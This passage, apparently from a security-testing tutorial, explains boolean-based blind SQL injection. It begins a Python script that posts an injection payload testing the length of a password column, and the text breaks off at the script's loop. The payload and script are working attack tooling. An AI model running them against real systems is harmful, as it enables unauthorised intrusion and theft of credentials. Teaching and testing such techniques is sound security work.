There are times when all you can get from a page is a yes or no. It's heartbreaking until you realize that that's the SQL equivalent of saying I LOVE YOU. All SQLi can be broken down into yes or no questions, depending on how patient you are.

We will create a script that takes a yes value and a URL and returns results based on a predefined attack string. I have provided an example attack string but this will change, depending on the system you are testing.

import requests import sys yes = sys.argv[1] i = 1 asciivalue = 1 answer = [] print “Kicking off the attempt” payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'} while True: ...